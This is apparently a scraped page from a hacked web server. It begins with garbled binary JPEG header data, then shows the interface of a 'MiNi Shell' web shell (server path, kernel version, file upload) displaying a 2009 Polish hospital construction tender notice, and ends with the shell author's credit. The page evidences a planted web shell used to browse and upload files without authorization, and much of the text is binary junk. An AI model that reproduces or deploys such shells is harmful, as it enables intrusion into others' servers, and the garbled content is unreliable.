JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091021/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091021/368426-N-2009.html

<p class="kh_header"><b>Otwock: Przebudowa i modernizacja części Samodzielnego Publicznego Szpitala Klinicznego (SPSK) w Otwocku na potrzeby Bloku Operacyjnego i Izby Przyjęć.</b><br>
<b>Numer ogłoszenia: 368426 - 2009; data zamieszczenia: 21.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Szpital Kliniczny im prof. Adama Grucy , ul. Konarskiego 13, 05-400 Otwock, woj. mazowieckie, tel. 022 7794031 w. 477, faks 022 7794031 w. 477.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spskgruca.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa i modernizacja części Samodzielnego Publicznego Szpitala Klinicznego (SPSK) w Otwocku na potrzeby Bloku Operacyjnego i Izby Przyjęć..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przewidziany do przebudowy obiekt o 8 kondygnacjach (1 kondygnacja podziemna i 7 kondygnacji nadziemnych) położony jest w Otwocku przy ul. Księdza St. Konarskiego 13. Obiekt ten został wybudowany w latach sześćdziesiątych ubiegłego wieku.
Przedmiot zamówienia obejmuje wykonanie robót budowlanych polegających na przebudowie bloku operacyjnego, izby przyjęć ostrego dyżuru, oddziału pooperacyjnego wraz z dobudową klatki schodowej. Ogólny zakres zamówienia obejmuje roboty rozbiórkowe, roboty budowlane, roboty instalacyjne (wodnokanalizacyjnej, co., gazów medycznych, ciepła technologicznego, chłodniczej, elektrycznej, komputerowej, sygnalizacji pożaru i oddymiania klatek schodowych), dostawę i montaż urządzenia dźwigowego. Zamawiający posiada pełną dokumentację projektową i specyfikację techniczną na całość w/w. robót.

W zakres rzeczowy zadania wchodzą: 
Zestaw 1:
1.	Dobudowa dodatkowej klatki schodowej i dostawa oraz montaż dźwigu szpitalnego
2.	Przebudowa parteru budynku D na potrzeby izby przyjęć ostrego dyżuru ortopedycznego
3.	Przebudowa III piętra budynku D na potrzeby bloku operacyjnego traumatologii (piętro III)

Zestaw 1 zadań realizowany będzie w ramach projektu Programu Operacyjnego Infrastruktura i Środowisko, oś priorytetowa XII, działanie 12.2 Inwestycje w infrastrukturę ochrony zdrowia o znaczeniu ponadregionalnym pt.: Przebudowa, modernizacja i wyposażenie części pomieszczeń SPSK w Otwocku na potrzeby nowoczesnego Bloku Operacyjnego Traumatologii i Izby Przyjęć.

Zestaw 2: 
1.	Przygotowanie terenu i objazdu na czas budowy
2.	Przebudowa II piętra budynku D na potrzeby oddziału pooperacyjnego (piętro II)
3.	Przebudowa IV piętra budynku D na potrzeby bloku operacyjnego ortopedii I (piętro IV)
4.	Przebudowa V piętra budynku D na potrzeby bloku operacyjnego ortopedii II (piętro V)
5.	Przebudowa VI piętra budynku D i piwnicy na zaplecze techniczne (piętro VI i piwnica)
6.	Ocieplenie budynku D szpitala.
Każdy z zestawów zadań będzie rozliczany niezależnie.

Realizacja inwestycji będzie przebiegała zgodnie z poniższym podziałem etapowym.
Elementy poszczególnych zestawów zadań realizowane będą zgodnie z następującym podziałem etapowym:
Etap I:	Przygotowanie terenu i objazdu na czas budowy
		Dobudowa dodatkowej klatki schodowej i dostawa oraz montaż dźwigu szpitalnego
      		Przebudowa parteru budynku D na potrzeby izby przyjęć ostrego dyżuru ortopedycznego
                   Przebudowa II piętra budynku D na potrzeby oddziału pooperacyjnego (piętro II)
      Etap II	Przebudowa III piętra budynku D na potrzeby bloku operacyjnego traumatologii   
Etap III	Przebudowa IV piętra budynku D na potrzeby bloku operacyjnego ortopedii I
Etap IV	Przebudowa V piętra budynku D na potrzeby bloku operacyjnego ortopedii II
Etap V	Ocieplenie budynku D szpitala.
Zaplecze techniczne szpitala (piętro VI i piwnica) - Realizowany przy każdym etapie w zakresie wymaganym dla danego etapu inwestycji.
Poszczególne etapy realizacji powinny być wykonywane niezależnie, zgodnie z przedstawionym podziałem. 
UWAGA: Wszystkie prace będą wykonywane w obiekcie czynnym (dopuszczalne jest wyłączenie jednocześnie tylko jednego piętra bloku operacyjnego).
Zamówienie będzie realizowane zgodnie z prawem polskim, w szczególności z ustawą Prawo budowlane. Wykonawca robót budowlanych powinien zapewnić wykonanie robót zgodnie z prawem polskim, w szczególności z przepisami techniczno-budowlanymi, przepisami dotyczącymi samodzielnych funkcji technicznych w budownictwie oraz przepisami dotyczącymi wyrobów budowlanych.

Roboty realizowane będą na podstawie następujących decyzji:
1.	Decyzji nr 208 P/2009 z dnia 16.02.2009 roku sygnatura pisma S.A.B./MP/7351/1/09 zatwierdzającej projekt budowlany i udzielającej pozwolenia na budowę wydanej przez Starostę Otwockiego.
2.	Decyzji nr 1064 P/2009 z dnia 17.08.2009 roku sygnatura pisma S.A.B./MP/7351/1141/09 zatwierdzającej projekt budowlany i udzielającej pozwolenia na budowę wydanej przez Starostę Otwockiego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.51.40-0, 45.11.00.00-1, 45.30.00.00-0, 45.40.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium na cały okres związania ofertą w wysokości: 400 000,00 zł (słownie złotych: czterysta tysięcy złotych). Szczegółowe informacje na temat wadium zawarte będą w Specyfikacji Istotnych Warunków Zamówienia (SIWZ), która zostanie przekazana Wykonawcom zaproszonym do składania ofert.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O zamówienie mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie przepisów art. 24 ust. 1 i 2 ustawy z dnia 29.01.2004 Prawo Zamówień Publicznych (j.t.: Dz. U. z 2007 r., Nr 223, poz. 1655 ze zm.), zwanej dalej /Pzp/ oraz spełniają poniższe warunki : 
1.1.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawiają pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. W szczególności Wykonawca musi wykazać, że: 
1.1.1.	Wykonawca dysponuje lub będzie dysponował osobami legitymującymi się doświadczeniem zawodowym odpowiednim do stanowisk, które zostaną im powierzone przy realizacji przedmiotowego zamówienia, tj.:   
a)	Kierownikiem budowy posiadającym minimum 5-letnie doświadczenie na stanowisku Kierownika budowy przy realizacji, co najmniej dwóch zamówień, z których każde obejmowało budowę lub przebudowę bloku operacyjnego w czynnych obiektach służby zdrowia (każde z nich o wartości minimum 4 000 000 złotych netto);
b)	Kierownikiem robót konstrukcyjno - budowlanych posiadającym minimum 3-letnie doświadczenie na stanowisku Kierownika budowy lub robót konstrukcyjno-budowlanych;
c)	 Kierownikiem robót w zakresie instalacji sanitarnych posiadającym minimum 3-letnie doświadczenie na stanowisku Kierownika budowy lub robót instalacji sanitarnych;
d)	Kierownikiem robót w zakresie instalacji elektrycznych posiadającym minimum 3 letnie doświadczenie na stanowisku Kierownika budowy lub robót instalacji elektrycznych. 
1.1.2.	wykonał należycie w okresie ostatnich 5 (pięciu) lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej dwa zamówienia, z których każde obejmowało budowę lub przebudowę bloku operacyjnego w czynnych obiektach służby zdrowia, o wartości każdego zamówienia minimum 4 000 000 złotych netto. Przez blok operacyjny rozumie się minimum dwie sale operacyjne łącznie z pomieszczeniami towarzyszącymi wymaganymi dla bloku operacyjnego. 
1.2.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. W szczególności Wykonawca musi wykazać, że: 
1.2.1. posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 15 000 000 złotych; 
1.2.2. osiągnął średnie roczne przychody netto ze sprzedaży w wysokości nie mniejszej niż 15 000 000 złotych w okresie ostatnich 3 lat obrotowych (tj. lat 2006, 2007, 2008), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.  
1.2.3 posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 30 000 000 złotych.
2.	W przypadku Wykonawców wspólnie ubiegających się o zamówienie warunki określone w pkt 1.1. i 1.2. mogą być spełnione łącznie przez Wykonawców wspólnie ubiegających się o zamówienie. 
3.	 Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły: /spełnia - nie spełnia/ w oparciu o informacje zawarte w załączonych do wniosku dokumentach i oświadczeniach. 
4.	Jeżeli liczba wykonawców, którzy spełniają warunki udziału w postępowaniu będzie mniejsza lub równa 5, zamawiający zaprosi do składania ofert wszystkich wykonawców spełniających te warunki. W przypadku, gdy liczba wykonawców, którzy spełniają warunki udziału w postępowaniu będzie większa niż 5, zamawiający zaprosi do składania ofert 5 wykonawców, którzy otrzymali najwyższe oceny spełniania warunku udziału w postępowaniu w zakresie posiadanego przez wykonawcę doświadczenia (pkt 1.1.2. ogłoszenia o zamówieniu). Ocena spełniania warunku udziału w postępowaniu w zakresie doświadczenia wykonawcy będzie polegała na przyznaniu wykonawcom po 1 pkt za każde dodatkowe należycie wykonane (ponad minimum dwa) zamówienie obejmujące budowę lub przebudowę bloku operacyjnego w czynnym obiekcie służby zdrowia o wartości co najmniej 4 000 000 złotych netto. W przypadku, gdy nie będzie można dokonać zakwalifikowania 5 wykonawców z uwagi na to, że dwóch lub więcej wykonawców uzyska taką samą liczbę punktów, zamawiający w odniesieniu do tych wykonawców przeprowadzi kolejną ocenę w oparciu o osiągnięty przez każdego z tych wykonawców przychód netto ze sprzedaży w 2008 roku. Dodatkowe punkty zostaną przyznane według wzoru: sprzedaż netto w  badanym wniosku/sprzedaż netto we wniosku o największej sprzedaży netto x 100 pkt., a zaproszony zostanie wykonawca, który uzyska w ten sposób największą liczbę punktów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wymagane dokumenty: 
1.1.	Oświadczenie o spełnieniu przez Wykonawcę warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 Pzp.
1.2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu. 
1.2.1. 	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 1.2, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono jego upadłości.
1.2.2.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa powyżej (pkt 1.2.1), należy je zastąpić dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. 
Dokumenty wymienione w pkt 1.2.1 powinny być wystawione w terminach analogicznych do odpowiadających im dokumentów wymienionych w pkt. 1.2.
1.3.	W celu potwierdzenia spełnienia warunku udziału w postępowaniu określonego w pkt A) 1.1.1.należy przedłożyć: 
1.3.1. 	wykaz osób przewidzianych do kierowania robotami budowlanymi, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich doświadczenia niezbędnymi do wykonania zamówienia, a także zakresu wykonywanych przez nich czynność; 
1.3.2. 	pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 1.3.1 powyżej, wykonawca wskazał osoby, którymi będzie dysponował. 
1.4. W celu potwierdzenia spełnienia warunku udziału w postępowaniu określonego w pkt A) 1.1.2. należy przedłożyć:
1.4.1. 	Wykaz wykonanych zamówień w okresie ostatnich pięciu lat przed datą wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, oraz dokumenty potwierdzające, że roboty te zostały wykonane należycie. Dla każdej roboty budowlanej w wykazie należy podać: a) nazwę zadania; b) wartość netto w złotych, c) opis roboty budowlanej (w tym roboty branżowe) z wyszczególnieniem informacji mających znaczenie dla oceny spełniania warunku określonego w ppkt 1.1.2, d) data zakończenia robót, e) miejsce wykonania, f) nazwa i adres zamawiającego. 
1.5. 	W celu potwierdzenia spełnienia warunku udziału w postępowaniu określonego w pkt A) 1.2 należy przedłożyć: 
1.5.1. 	Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu (w celu potwierdzenia spełnienia warunku udziału w postępowaniu określonego w pkt A 1.2.1).
1.5.2. 	Część sprawozdania finansowego tj. bilans oraz rachunek zysków i strat z oznaczeniem podmiotu na rzecz, którego został sporządzony, a jeżeli podlega on badaniu przez biegłego rewidenta, zgodnie z przepisami o rachunkowości również z opinią o badanej w/w części sprawozdania, a w przypadku wykonawców nie zobowiązanych do sporządzania bilansu oraz rachunku zysków i strat - inne dokumenty określające obroty, zysk oraz zobowiązania i należności - za ostatnie trzy lata obrotowe (tj. 2006, 2007, 2008), a jeżeli okres prowadzenia działalności jest krótszy - za ten okres (w celu potwierdzenia spełnienia warunku udziału w postępowaniu określonego w pkt A) 1.2.2). 
1.5.3 	polisę(y) a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności (w celu potwierdzenia spełnienia warunku udziału w postępowaniu określonego w pkt A 1.2.3); 
2. 	W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców: 
2.1. dokument wymieniony w pkt. B) 1.1 może być złożony wspólnie, lecz w takim wypadku oświadczenie musi być podpisane przez pełnomocnika upoważnionego do ich reprezentowania w postępowaniu lub reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego albo przez upoważnionych przedstawicieli każdego z Wykonawców wspólnie ubiegających się o zamówienie. 
2.2. dokument wymieniony w pkt B) 1.2. składa osobno każdy z wykonawców wspólnie ubiegających się o zamówienie;
2.3. dokumenty wymienione w pkt B) 1.3., 1.4., 1.5. powinny być złożone przez tego lub tych wykonawców którzy łącznie potwierdzają spełnianie warunków udziału w postępowaniu. 
3. 	Dokumenty, o których mowa w pkt. B) 1 powinny być złożone w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę. 
4. 	Dokumenty sporządzone w języku obcym należy złożyć wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.
5.	Wartości podane w dokumentach w walutach innych niż wskazane przez Zamawiającego będą przeliczane: 
a)	dla /przychodu/ według średniego kursu NBP na dzień zakończenia roku obrachunkowego, 
b)	dla posiadanych środków finansowych lub zdolności kredytowej wg średniego kursu NBP na dzień ukazania się niniejszego ogłoszenia w Biuletynie Zamówień Publicznych,
c)	dla doświadczenia określonego w Wykazie wykonanych zamówień według średniego kursu NBP na dzień wystawienia protokołu odbioru (Świadectwa Przejęcia).
6.	Zamawiający udostępni na swojej stronie internetowej wzory formularzy Wniosku o dopuszczenie do udziału w postępowaniu i oświadczenia o spełnianiu warunków udziału w postępowaniu..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p><br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 98</li>
<li>2 - Gwarancja - 2</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nie dotyczy..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.10.2009 godzina 10:00, miejsce: Samodzielny Publiczny Szpital Kliniczny im. Prof. A. Grucy CMKP ul. Konarskiego 13, 05-400 Otwock. Sekretariat Dyrektora Naczelnego /Budynek Administracji/..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wykonawcy zainteresowani udziałem w postępowaniu powinni złożyć pisemny wniosek o dopuszczenie do udziału w postępowaniu. Przedmiotowy wniosek należy złożyć w siedzibie Zamawiającego w Otwocku, w terminie określonym w niniejszym ogłoszeniu, w zamkniętej kopercie zaadresowanej na adres Zamawiającego i oznaczonej: /Wniosek o dopuszczenie do udziału w postępowaniu/ oraz nazwą Wykonawcy. Wniosek powinien zawierać oznaczenie podmiotów składających wniosek (nazwa, siedziba, telefon, fax, e-mail, NIP, Regon). Do wniosku należy załączyć:
1.	Dokumenty i oświadczenia wymienione w sekcji III.2.pkt B);
2.	Pełnomocnictwo w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia upoważniające do reprezentowania wykonawców w trakcie postępowania (pełnomocnictwo może także obejmować uprawnienie do zawarcia umowy). Pełnomocnictwo musi być przedstawione w formie oryginału lub kopii poświadczonej notarialnie za zgodność z oryginałem. 
3.	Pełnomocnictwo dla osoby podpisującej wniosek o dopuszczenie do udziału w postępowaniu, oświadczenia lub inne dokumenty, a także poświadczającej za zgodność z oryginałem kopii dokumentów, jeżeli upoważnienie dla niej nie wynika z innych dokumentów złożonych wraz z wnioskiem. Pełnomocnictwo musi być przedstawione w formie oryginału lub kopii poświadczonej notarialnie za zgodność z oryginałem.
 
Podpisanie wniosku o dopuszczenie do udziału w postępowaniu i poświadczenia za zgodność z oryginałem powinny być sporządzone w sposób umożliwiający identyfikację podpisu (np. czytelny podpis lub parafa wraz z imienną pieczątką osoby podpisującej dokument lub poświadczającej kopię). 
Wszelkie poprawki lub zmiany w tekście wniosku o dopuszczenie do udziału w postępowaniu muszą być parafowane i datowane własnoręcznie przez osobę podpisującą wniosek.
Wszystkie strony wniosku o dopuszczenie do udziału w postępowaniu zawierające jego treść winny być ponumerowane.
Wzory formularzy do złożenia wniosku do pobrania na stronie www.spskgruca.pl
Zamawiający informuje, iż na etapie składania wniosków o dopuszczenie do udziału w postępowaniu nie przewiduje się udzielania wyjaśnień oraz odpowiedzi na zapytania.

Creat By MiNi SheLL
Email: jattceo@gmail.com